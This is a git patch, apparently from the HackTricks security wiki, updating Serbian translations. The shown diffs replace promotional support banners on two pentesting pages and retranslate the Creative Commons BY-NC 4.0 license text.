From 8359fdc395eb70f4ce821a509a9a070ccd1e052b Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 18 Jul 2024 18:27:34 +0000 Subject: [PATCH] Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md --- 1911-pentesting-fox.md | 46 +++- 6881-udp-pentesting-bittorrent.md | 32 +-- LICENSE.md | 177 ++++++++----- android-forensics.md | 50 ++-- backdoors/icmpsh.md | 37 +-- .../README.md | 170 ++++++------- burp-suite.md | 38 +-- c2/icmpsh.md | 34 +-- .../blockchain-and-crypto-currencies.md | 59 ++--- .../cipher-block-chaining-cbc-mac-priv.md | 46 ++-- crypto-and-stego/crypto-ctfs-tricks.md | 49 ++-- crypto-and-stego/electronic-code-book-ecb.md | 41 +-- crypto-and-stego/rc4-encrypt-and-decrypt.md | 40 ++- .../cipher-block-chaining-cbc-mac-priv.md | 62 ++--- cryptography/crypto-ctfs-tricks.md | 162 ++++-------- cryptography/electronic-code-book-ecb.md | 80 +++--- cryptography/hash-length-extension-attack.md | 46 ++-- cryptography/padding-oracle-priv.md | 78 +++--- cryptography/rc4-encrypt-and-decrypt.md | 38 +-- emails-vulns.md | 31 +-- .../linux-exploiting-basic-esp/fusion.md | 85 ++----- exploiting/tools/pwntools.md | 112 +++++---- ...windows-exploiting-basic-guide-oscp-lvl.md | 127 ++++------ .../anti-forensic-techniques.md | 77 +++--- .../docker-forensics.md | 65 ++--- .../file-integrity-monitoring.md | 48 ++-- .../malware-analysis.md | 203 ++++----------- .../file-data-carving-tools.md | 62 ++--- .../pcap-inspection/README.md | 177 ++++++------- .../usb-keyboard-pcap-analysis.md | 38 +-- .../pcap-inspection/usb-keystrokes.md | 40 +-- .../pcap-inspection/wifi-pcap-analysis.md | 57 ++--- .../README.md | 36 +-- .../desofuscation-vbs-cscript.exe.md | 47 ++-- .../png-tricks.md | 41 ++- .../video-and-audio-file-analysis.md | 45 ++-- .../zips-tricks.md | 44 ++-- .../windows-forensics/README.md | 182 +++++++------- .../interesting-windows-registry-keys.md | 98 +++++--- .../windows-forensics/windows-processes.md | 90 ++++--- .../docker-forensics.md | 35 +-- .../file-integrity-monitoring.md | 38 +-- .../malware-analysis.md | 74 +++--- .../README.md | 34 +-- .../desofuscation-vbs-cscript.exe.md | 34 +-- .../png-tricks.md | 35 +-- .../video-and-audio-file-analysis.md | 45 ++-- .../zips-tricks.md | 40 ++- .../interesting-windows-registry-keys.md | 73 +++--- .../exfiltration.md | 161 ++++-------- .../github-leaked-secrets.md | 44 ++-- .../wide-source-code-search.md | 40 +-- .../pentesting-network/dhcpv6.md | 52 ++-- .../pentesting-network/eigrp-attacks.md | 74 +++--- .../glbp-and-hsrp-attacks.md | 58 ++--- .../pentesting-network/ids-evasion.md | 54 ++-- .../network-protocols-explained-esp.md | 67 ++--- .../pentesting-network/nmap-summary-esp.md | 234 +++++++++--------- .../pentesting-network/pentesting-ipv6.md | 118 ++++----- ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 108 ++++---- .../pentesting-wifi/evil-twin-eap-tls.md | 74 +++--- .../phishing-methodology/clone-a-website.md | 34 +-- .../python/basic-python.md | 128 +++++----- .../python/bruteforce-hash-few-chars.md | 34 +-- .../load_name-load_const-opcode-oob-read.md | 76 +++--- ...s-pollution-pythons-prototype-pollution.md | 200 +++++++-------- .../python/pyscript.md | 42 ++-- .../python/python-internal-read-gadgets.md | 54 ++-- .../shells/README.md | 36 +-- .../shells/full-ttys.md | 56 ++--- .../shells/windows.md | 60 ++--- interesting-http.md | 44 ++-- .../ddexec.md | 75 +++--- .../linux-post-exploitation/README.md | 76 +++--- .../containerd-ctr-privilege-escalation.md | 46 ++-- ...-command-injection-privilege-escalation.md | 130 +++++----- online-platforms-with-api.md | 73 +++--- other-web-tricks.md | 66 ++--- pentesting-dns.md | 33 +-- .../lfi2rce-via-nginx-temp-files.md | 43 ++-- .../lfi2rce-via-segmentation-fault.md | 42 ++-- .../via-php_session_upload_progress.md | 48 ++-- .../browser-http-request-smuggling.md | 34 +-- post-exploitation.md | 46 ++-- .../format-strings/format-strings-template.md | 34 +-- .../rop-leaking-libc-template.md | 36 +-- ...itive-information-disclosure-from-a-web.md | 44 ++-- todo/6881-udp-pentesting-bittorrent.md | 32 +-- todo/burp-suite.md | 41 ++- todo/emails-vulns.md | 19 +- todo/interesting-http.md | 23 +- todo/other-web-tricks.md | 45 ++-- todo/pentesting-dns.md | 33 +-- todo/post-exploitation.md | 29 +-- 94 files changed, 2973 insertions(+), 3321 deletions(-) diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index e90142604..a3d529d2e 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -1,18 +1,19 @@ # 1911 - Pentesting fox +{% hint style="success" %} +Naučite i vežbajte AWS hakovanje: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte GCP hakovanje: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite videti **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} I još usluga: @@ -24,4 +25,31 @@ dht udp "DHT Nodes" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) ( +![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) + +InfluxDB + +![](<.gitbook/assets/image (337).png>) + +![](<.gitbook/assets/image (338).png>) + +![](<.gitbook/assets/image (339).png>) + +![](<.gitbook/assets/image (340).png>) + +![](<.gitbook/assets/image (341).png>) + +{% hint style="success" %} +Naučite i vežbajte AWS hakovanje: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte GCP hakovanje: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Podržite HackTricks + +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. + +
+{% endhint %} diff --git a/6881-udp-pentesting-bittorrent.md b/6881-udp-pentesting-bittorrent.md index e352bd232..d0e2fe205 100644 --- a/6881-udp-pentesting-bittorrent.md +++ b/6881-udp-pentesting-bittorrent.md @@ -1,30 +1,14 @@ -
- -Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! - -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. - -
- - - +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/LICENSE.md b/LICENSE.md index af29716f3..30515f504 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,89 +1,109 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite videti **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -Creative Commons License
Autorsko pravo © Carlos Polop 2021. Osim ako nije drugačije navedeno (spoljni podaci kopirani u knjigu pripadaju originalnim autorima), tekst na HACK TRICKS od Carlos Polop-a je licenciran pod Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0). +Creative Commons License
Autorsko pravo © Carlos Polop 2021. Osim ako nije drugačije navedeno (spoljni podaci kopirani u knjigu pripadaju originalnim autorima), tekst na HACK TRICKS od Carlos Polopa je licenciran pod Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0). -Licenca: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)
-Čitljiva Licenca: https://creativecommons.org/licenses/by-nc/4.0/
-Potpuni Pravni Uslovi: https://creativecommons.org/licenses/by-nc/4.0/legalcode
-Formatiranje: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
+Licenca: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)
Čitljiva licenca: https://creativecommons.org/licenses/by-nc/4.0/
Kompletni pravni uslovi: https://creativecommons.org/licenses/by-nc/4.0/legalcode
Formatiranje: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
-# kreativne zajednice +# creative commons # Attribution-NonCommercial 4.0 International -Korporacija Creative Commons ("Creative Commons") nije advokatska firma i ne pruža pravne usluge ili pravne savete. Distribucija Creative Commons javnih licenci ne stvara odnos advokata i klijenta ili drugi odnos. Creative Commons svoje licence i povezane informacije stavlja na raspolaganje "kakve jesu". Creative Commons ne daje nikakve garancije u vezi sa svojim licencama, materijalom licenciranim pod njihovim uslovima ili bilo kojim povezanim informacijama. Creative Commons se odriče svake odgovornosti za štetu nastalu njihovom upotrebom u najvećoj mogućoj meri. +Korporacija Creative Commons ("Creative Commons") nije advokatska firma i ne pruža pravne usluge ili pravne savete. Distribucija javnih licenci Creative Commons ne stvara odnos advokat-klijent ili bilo koji drugi odnos. Creative Commons svoje licence i povezane informacije stavlja na raspolaganje "kakve jesu". Creative Commons ne daje nikakve garancije u vezi sa svojim licencama, materijalom licenciranim pod njihovim uslovima i uslovima ili bilo kojim povezanim informacijama. Creative Commons odbacuje svu odgovornost za štetu proizašlu iz njihove upotrebe u najvećoj mogućoj meri. ## Korišćenje javnih licenci Creative Commons -Javne licence Creative Commons pružaju standardni skup uslova koje autori i drugi nosioci prava mogu koristiti za deljenje originalnih autorskih dela i drugog materijala koji podleže autorskim pravima i određenim drugim pravima navedenim u javnoj licenci u nastavku. Sledeći razmatranja su samo informativne prirode, nisu iscrpna i ne čine deo naših licenci. +Javne licence Creative Commons pružaju standardni skup uslova koje kreatori i drugi nosioci prava mogu koristiti za deljenje originalnih autorskih dela i drugog materijala podložnog autorskim pravima i određenim drugim pravima navedenim u javnoj licenci ispod. Sledeće razmatranja su samo informativne prirode, nisu iscrpna i ne čine deo naših licenci. -* __Razmatranja za davaoce licence:__ Naše javne licence namenjene su onima koji su ovlašćeni da javnosti daju dozvolu za korišćenje materijala na načine koji su inače ograničeni autorskim pravima i određenim drugim pravima. Naše licence su neopozive. Davaoci licence treba da pročitaju i razumeju uslove licence koju biraju pre nego što je primene. Davaoci licence takođe treba da obezbede sva prava koja su neophodna pre primene naših licenci kako bi javnost mogla da ponovo koristi materijal kako se očekuje. Davaoci licence treba jasno da označe sav materijal koji nije obuhvaćen licencom. To uključuje drugi materijal licenciran pod CC licencom ili materijal koji se koristi pod izuzetkom ili ograničenjem autorskih prava. [Više razmatranja za davaoce licence](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). +* __Razmatranja za davaoce licenci:__ Naše javne licence namenjene su za korišćenje od strane onih koji su ovlašćeni da javnosti daju dozvolu za korišćenje materijala na načine koji su inače ograničeni autorskim pravima i određenim drugim pravima. Naše licence su neopozive. Davaoci licenci treba da pročitaju i razumeju uslove licence koju izaberu pre nego što je primene. Davaoci licenci takođe treba da obezbede sva potrebna prava pre primene naših licenci kako bi javnost mogla ponovo koristiti materijal kako se očekuje. Davaoci licenci treba jasno označe sav materijal koji nije predmet licence. To uključuje drugi materijal sa CC licencom ili materijal korišćen pod izuzetkom ili ograničenjem autorskih prava. [Više razmatranja za davaoce licenci](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). -* __Razmatranja za javnost:__ Korišćenjem jedne od naših javnih licenci, davalac licence daje javnosti dozvolu za korišćenje licenciranog materijala pod određenim uslovima. Ako dozvola davaoca licence nije potrebna iz bilo kog razloga - na primer, zbog primene bilo kog izuzetka ili ograničenja autorskih prava - tada to korišćenje nije regulisano licencom. Naše licence daju samo dozvole u okviru autorskih prava i određenih drugih prava koja davalac licence ima ovlašćenje da dodeli. Korišćenje licenciranog materijala može biti ograničeno iz drugih razloga, uključujući i zato što drugi imaju autorska prava ili druga prava na materijal. Davalac licence može postaviti posebne zahteve, kao što je traženje da se sve promene označe ili opišu. Iako to nije obavezno prema našim licencama, ohrabrujemo vas da poštujete te zahteve gde je to razumno. [Više razmatranja za javnost](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). +* __Razmatranja za javnost:__ Korišćenjem jedne od naših javnih licenci, davalac licence daje javnosti dozvolu za korišćenje licenciranog materijala pod određenim uslovima. Ako dozvola davaoca licence nije potrebna iz bilo kog razloga - na primer, zbog bilo kog primenljivog izuzetka ili ograničenja autorskih prava - tada to korišćenje nije regulisano licencom. Naše licence daju samo dozvole u okviru autorskih prava i određenih drugih prava za koje davalac licence ima ovlašćenje da ih dodeli. Korišćenje licenciranog materijala može biti ograničeno iz drugih razloga, uključujući zato što drugi imaju autorska prava ili druga prava na materijal. Davalac licence može postaviti posebne zahteve, kao što je traženje da se sve promene označe ili opišu. Iako to nije obavezno prema našim licencama, ohrabrujemo vas da poštujete te zahteve gde je to razumno. [Više razmatranja za javnost](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). # Creative Commons Attribution-NonCommercial 4.0 International Public License -Izvršavanjem Licenciranih Prava (definisanih u nastavku), prihvatate i slažete se da budete obavezani uslovima i odredbama ove Creative Commons Attribution-NonCommercial 4.0 International Public License ("Javna Licenca"). U meri u kojoj se ova Javna Licenca može tumačiti kao ugovor, Vi dobijate Licencirana Prava u zamenu za Vaše prihvatanje ovih uslova i odredbi, a Licencirajući Vam dodeljuje takva prava u zamenu za koristi koje Licencirajući dobija pružanjem Licenciranog Materijala dostupnog pod ovim uslovima i odredbama. +Vršeći Licencirana Prava (definisana u nastavku), Vi prihvatate i saglasni ste da budete obavezani uslovima i odredbama ove Creative Commons Attribution-NonCommercial 4.0 International Public License ("Javna Licenca"). U meri u kojoj se ova Javna Licenca može tumačiti kao ugovor, Vi dobijate Licencirana Prava u obziru na Vaše prihvatanje ovih uslova i odredbi, a Davaoc licenci Vam dodeljuje takva prava u obziru na koristi koje Davaoc licenci dobija pravljenjem Licenciranog Materijala dostupnog pod ovim uslovima i odredbama. ## Sekcija 1 - Definicije. -a. __Prilagođeni Materijal__ označava materijal koji podleže autorskim pravima i sličnim pravima i koji je izveden iz ili zasnovan na Licenciranom Materijalu i u kojem je Licencirani Materijal preveden, izmenjen, aranžiran, transformisan ili na drugi način izmenjen na način koji zahteva dozvolu u skladu sa autorskim pravima i sličnim pravima koja drži Licencirajući. U smislu ove Javne Licence, gde je Licencirani Materijal muzičko delo, izvođenje ili tonski zapis, Prilagođeni Materijal se uvek proizvodi kada se Licencirani Materijal sinhronizuje u vremenskom odnosu sa pokretnom -## Sekcija 2 - Obuhvat. +a. __Prilagođeni Materijal__ znači materijal podložan autorskim pravima i sličnim pravima koji je izveden iz ili zasnovan na Licenciranom Materijalu i u kojem je Licencirani Materijal preveden, izmenjen, aranžiran, transformisan ili na drugi način modifikovan na način koji zahteva dozvolu prema autorskim pravima i sličnim pravima koje ima Davaoc licenci. U svrhe ove Javne Licence, gde je Licencirani Materijal muzičko delo, izvođenje ili tonski zapis, Prilagođeni Materijal uvek nastaje kada je Licencirani Materijal sinhronizovan u vremenskom odnosu sa pokretnom slikom. + +b. __Licenca Prilagoditelja__ znači licencu koju primenjujete na Vaša autorska prava i slična prava u Vašim doprinosima Prilagođenom Materijalu u skladu sa uslovima ove Javne Licence. + +c. __Autorska prava i slična prava__ znače autorska prava i/ili slična prava blisko povezana sa autorskim pravima, uključujući, bez ograničenja, izvođenje, emitovanje, tonski zapis i Sui Generis Database Rights, bez obzira na to kako su prava označena ili kategorizovana. U svrhe ove Javne Licence, prava navedena u Odeljku 2(b)(1)-(2) nisu Autorska prava i slična prava. + +d. __Efektivne Tehnološke Mere__ znače mere koje, u odsustvu odgovarajuće ovlašćenosti, ne mogu biti zaobiđene u skladu sa zakonima koji ispunjavaju obaveze prema članu 11 Ugovora o autorskim pravima WIPO-a usvojenog 20. decembra 1996. godine, i/ili sličnim međunarodnim sporazumima. + +e. __Izuzeci i Ograničenja__ znače pravičnu upotrebu, fer korišćenje i/ili bilo koji drugi izuzetak ili ograničenje autorskih prava i sličnih prava koje se odnose na Vašu upotrebu Licenciranog Materijala. + +f. __Licencirani Materijal__ znači umetničko ili književno delo, bazu podataka ili drugi materijal na koji je Davaoc licenci primenio ovu Javnu Licencu. + +g. __Licencirana Prava__ znače prava koja su Vam dodeljena pod uslovima ove Javne Licence, koja su ograničena na sva autorska prava i slična prava koja se odnose na Vašu upotrebu Licenciranog Materijala i koja Davaoc licenci ima ovlašćenje da licencira. + +h. __Davaoc licenci__ znači fizičko ili pravno lice koje dodeljuje prava pod ovom Javnom Licencom. + +i. __NonCommercial__ znači da nije pretežno namenjen ili usmeren ka komercijalnoj koristi ili novčanoj nadoknadi. U svrhe ove Javne Licence, razmena Licenciranog Materijala za drugi materijal podložan autorskim pravima i sličnim pravima putem deljenja digitalnih fajlova ili sličnih sredstava je NonCommercial pod uslovom da nema plaćanja novčane nadoknade u vezi sa razmenom. + +j. __Deljenje__ znači pružanje materijala javnosti putem bilo kog sredstva ili procesa koji zahteva dozvolu pod Licenciranim Pravima, kao što su reprodukcija, javni prikaz, javno izvođenje, distribucija, širenje, komunikacija ili uvoz, i činjenje materijala dostupnim javnosti na načine na koje članovi javnosti mogu pristupiti materijalu sa mesta i u vreme koje su sami izabrali. + +k. __Sui Generis Database Rights__ znače prava koja nisu autorska prava proizašla iz Direktive 96/9/EC Evropskog parlamenta i Saveta od 11. marta 1996. godine o pravnoj zaštiti baza podataka, kako je izmenjena i/ili nasledila, kao i druga suštinski ekvivalentna prava bilo gde u svetu. + +l. __Vi__ znači fizičko ili pravno lice koje vrši Licencirana Prava pod ovom Javnom Licencom. Vaš ima odgovarajuće značenje. +## Sekcija 2 – Obuhvat. a. ___Dodela licence.___ -1. U skladu sa uslovima ove Javne licence, Davaoc licence ovim dodeljuje Vama širom sveta, besplatnu, ne sublicenciranu, neekskluzivnu, neopozivu licencu za vršenje Licenciranih prava nad Licenciranim materijalom radi: +1. Pod uslovima ove Javne licence, Davaoc licence ovim putem dodeljuje Vama širom sveta, besplatnu, ne sublicenciranu, neekskluzivnu, neopozivu licencu za vršenje Licenciranih prava na Licenciranom materijalu radi: -A. reprodukcije i deljenja Licenciranog materijala, u celini ili delimično, samo u nekomercijalne svrhe; i +A. reprodukcije i Deljenja Licenciranog materijala, u celini ili delimično, isključivo u nekomercijalne svrhe; i -B. proizvodnje, reprodukcije i deljenja Prilagođenog materijala samo u nekomercijalne svrhe. +B. proizvodnje, reprodukcije i Deljenja Prilagođenog materijala isključivo u nekomercijalne svrhe. -2. __Izuzeci i ograničenja.__ Radi izbegavanja nedoumica, gde se Izuzeci i ograničenja primenjuju na Vašu upotrebu, ova Javna licenca se ne primenjuje i nije potrebno da se pridržavate njenih uslova. +2. __Izuzeci i ograničenja.__ Radi izbegavanja nedoumica, gde Izuzeci i ograničenja važe za Vašu upotrebu, ova Javna licenca se ne primenjuje, i nije Vam potrebno da se pridržavate njenih uslova. -3. __Rok.__ Rok trajanja ove Javne licence je naveden u Odeljku 6(a). +3. __Rok.__ Rok važenja ove Javne licence je naveden u Sekciji 6(a). -4. __Mediji i formati; dozvoljene tehničke izmene.__ Davaoc licence Vam dozvoljava da vršite Licencirana prava u svim medijima i formatima, bilo da su poznati ili stvoreni u budućnosti, i da vršite tehničke izmene koje su neophodne za to. Davaoc licence odriče se i/ili se slaže da neće tvrditi bilo kakvo pravo ili ovlašćenje da Vam zabrani da vršite tehničke izmene koje su neophodne za vršenje Licenciranih prava, uključujući tehničke izmene koje su neophodne za zaobilaženje Efektivnih tehnoloških mera. U svrhu ove Javne licence, jednostavno vršenje izmena koje su odobrene ovim Odeljkom 2(a)(4) nikada ne proizvodi Prilagođeni materijal. +4. __Mediji i formati; dozvoljene tehničke modifikacije.__ Davaoc licence Vam ovlašćuje da vršite Licencirana prava u svim medijima i formatima, bilo da su trenutno poznati ili stvoreni u budućnosti, i da vršite tehničke modifikacije neophodne za to. Davaoc licence odriče se i/ili se slaže da neće tvrditi bilo koje pravo ili ovlašćenje da Vam zabrani da vršite tehničke modifikacije neophodne za vršenje Licenciranih prava, uključujući tehničke modifikacije neophodne za zaobilaženje Efikasnih tehnoloških mera. U svrhe ove Javne licence, jednostavno vršenje modifikacija ovlašćenih ovom Sekcijom 2(a)(4) nikada ne proizvodi Prilagođeni materijal. -5. __Primalac dalje distribucije.__ +5. __Krajnji korisnici.__ -A. __Ponuda od Davaoca licence - Licencirani materijal.__ Svaki primalac Licenciranog materijala automatski dobija ponudu od Davaoca licence da vrši Licencirana prava u skladu sa uslovima ove Javne licence. +A. __Ponuda od Davaoca licence – Licencirani materijal.__ Svaki primalac Licenciranog materijala automatski prima ponudu od Davaoca licence da vrši Licencirana prava pod uslovima ove Javne licence. -B. __Nema ograničenja dalje distribucije.__ Ne smete ponuditi ili nametnuti dodatne ili različite uslove ili ograničenja na Licencirani materijal, niti primenjivati Efektivne tehnološke mere na Licencirani materijal, ako to ograničava vršenje Licenciranih prava od strane bilo kog primaoca Licenciranog materijala. +B. __Bez ograničenja prema nizvodno.__ Ne smete ponuditi ili nametnuti bilo kakve dodatne ili različite uslove ili primeniti bilo koje Efikasne tehnološke mere na Licencirani materijal ako to ograničava vršenje Licenciranih prava od strane bilo kog primaoca Licenciranog materijala. -6. __Nema preporuke.__ Ništa u ovoj Javnoj licenci ne predstavlja ili se ne može tumačiti kao dozvola da tvrdite ili implicirate da ste Vi, ili da je Vaša upotreba Licenciranog materijala, povezana sa, ili sponzorisana, podržana ili dobila zvanični status od strane Davaoca licence ili drugih koji su određeni da prime priznanje kako je navedeno u Odeljku 3(a)(1)(A)(i). +6. __Bez preporuke.__ Ništa u ovoj Javnoj licenci ne predstavlja ili se ne može tumačiti kao dozvola da tvrdite ili implicirate da ste Vi, ili da je Vaša upotreba Licenciranog materijala, povezana sa, ili sponzorisana, podržana ili dodeljen zvanični status od strane Davaoca licence ili drugih ovlašćenih da prime atribuciju kako je predviđeno u Sekciji 3(a)(1)(A)(i). b. ___Druga prava.___ -1. Moralna prava, kao što je pravo na integritet, nisu licencirana ovom Javnom licencom, niti su licencirana prava na javnost, privatnost i/ili druga slična prava ličnosti; međutim, u najvećoj mogućoj meri, Davaoc licence odriče se i/ili slaže da neće tvrditi bilo kakva takva prava koja ima Davaoc licence, u meri koja je neophodna da Vam omogući vršenje Licenciranih prava, ali ne i drugačije. +1. Moralna prava, kao što je pravo na integritet, nisu licencirana ovom Javnom licencom, niti javnost, privatnost i/ili druga slična prava ličnosti; međutim, u meri u kojoj je moguće, Davaoc licence odriče se i/ili se slaže da ne tvrdi bilo kakva takva prava koja poseduje Davaoc licence u ograničenoj meri neophodnoj da Vam omogući vršenje Licenciranih prava, ali ne i drugačije. -2. Patentna i trgovačka prava nisu licencirana ovom Javnom licencom. +2. Patentna i zaštitna prava nisu licencirana ovom Javnom licencom. -3. U najvećoj mogućoj meri, Davaoc licence odriče se prava da od Vas naplati naknadu 